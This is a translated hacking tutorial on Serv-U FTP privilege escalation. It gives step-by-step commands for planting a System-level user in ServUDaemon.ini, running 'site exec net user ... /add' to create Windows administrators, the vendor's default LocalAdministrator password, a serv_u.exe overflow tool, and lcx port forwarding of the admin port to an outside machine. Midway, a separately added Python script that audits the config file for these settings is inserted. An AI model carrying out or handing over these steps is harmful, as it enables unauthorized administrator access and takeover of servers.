0x00 Serv-U overview
- Serv-U FTP Server is a widely used FTP server that supports the whole Windows line (3x / 9x / ME / NT / 2K). The server can define multiple users, each with its own permissions, home directory and log space size.
- Serv-U default installation directory: C:\Program Files\rhinosoft.com\Serv-U
- Serv-U password file: ServUDaemon.ini
- Port number: the default management port is 43958.
The port is set in ServUDaemon.ini by the key LocalSetupPortNo=
0x01 FTP privilege escalation methods
1. With modify permission on the configuration file
2. Without modify permission
3. Serv-U FTP overflow local privilege escalation (works on 6.0 and earlier)
4. Serv-U FTP port forwarding
0x02 With modify permission
Steps:
1. Check whether Serv-U is installed
Confirm with an nmap port scan.
2. Check whether the configuration file is writable
Typical location: C:\Program Files\Serv-U\ServUDaemon.ini
3. Add a Serv-U user
After the User4= entry, add a system user block:
[USER=quan|1] // user name
Password= // the user's password, stored as the hash described below
HomeDir=c:\ftp\quan // home directory
RelPaths=3
TimeOut=600 // idle timeout
Maintenance=System // privilege level
Access1=C:\|RWAMELCDP // accessible directory and its rights
Access2=d:\|RWAMELCDP // accessible directory and its rights
Access3=e:\|RWAMELCDP // accessible directory and its rights
SKEYValues=
Password format: two random characters + md5(the same two random characters + plaintext), e.g. with the plaintext 123456.
4. Connect to the target FTP server
ftp <target IP> and log in with the user and password just added
5. Use the FTP command quote site exec
to add a user and join it to the administrators group:
quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add
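As an added defensive check that is not part of the original post: a Python audit script that parses a ServUDaemon.ini in the layout shown above and flags every user block carrying the two settings this method relies on, Maintenance=System and an Access entry on a whole drive root. The INI fragment is constructed for the example; the user names in it are placeholders.

```python
import configparser
import re

# Constructed ServUDaemon.ini fragment in the layout the page shows (not taken
# from any real server). One user has the risky settings, one is scoped sanely.
SAMPLE_INI = r"""
[USER=quan|1]
Password=ab1234567890ABCDEF1234567890ABCDEF
HomeDir=c:\ftp\quan
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\|RWAMELCDP

[USER=alice|1]
Password=cd1234567890ABCDEF1234567890ABCDEF
HomeDir=c:\ftp\alice
Maintenance=None
Access1=c:\ftp\alice|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"[A-Za-z]:\\?")   # matches C:\ , d:\ , e: ...
FULL_RIGHTS = set("RWAMELCDP")             # the rights string the page uses


def audit_servu_ini(text):
    """Return (user, finding) pairs for every [USER=...] section that matches
    the escalation pattern: server-wide Maintenance rights, or an Access entry
    that grants rights on an entire drive rather than a home directory."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                   # keep key case (Access1, HomeDir)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if not section.upper().startswith("USER="):
            continue
        user = section[len("USER="):].split("|")[0]
        opts = cp[section]
        if opts.get("Maintenance", "").strip().lower() == "system":
            findings.append((user, "Maintenance=System: server-wide admin"))
        for key, raw in opts.items():
            if not key.lower().startswith("access"):
                continue
            value = raw.split("//")[0].strip()          # drop trailing // notes
            path, _, perms = value.partition("|")
            perms = set(perms.strip().upper())
            if DRIVE_ROOT.fullmatch(path.strip()):
                level = "full" if FULL_RIGHTS <= perms else "partial"
                findings.append((user, f"{key}={path.strip()} drive root, {level} rights"))
    return findings
```

Run it against a copy of the live ServUDaemon.ini; any user other than the intended administrators showing up in the output should be treated as a sign the file has been tampered with.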
0x03 Without modify permission
1. Decrypt the stored password directly with an MD5 lookup
2. Use the default administrator user name and password
Account: LocalAdministrator, password: #l@$ak#.lk;0@P
Command:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3. When the default password does not work
Download ServUAdmin.exe directly,
open it in WinHex and search for LocalAdministrator (select ANSI characters) to find the password.
0x04 Serv-U FTP overflow local privilege escalation (works on 6.0 and earlier)
Steps:
1. Use the Serv-U privilege escalation integrated tool serv_u.exe
2. Upload serv_u.exe to a drive root,
for example drive D:
3. Run
d:\serv_u.exe
d:\serv_u.exe "net user quan quan123 /add"
d:\serv_u.exe "net localgroup administrators quan /add"
Note that the command must be enclosed in quotes.
0x05 Serv-U FTP port forwarding
1. lcx port forwarding
Run lcx on the target from the webshell:
lcx -slave yourIP 5000 127.0.0.1 43958
Run on your own machine:
lcx -listen 5000 21
2. Log in to Serv-U from your own machine
Open the local Serv-U administrator, enter the IP 127.0.0.1,
account LocalAdministrator, password #l@$ak#.lk;0@P
0x06 References
https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html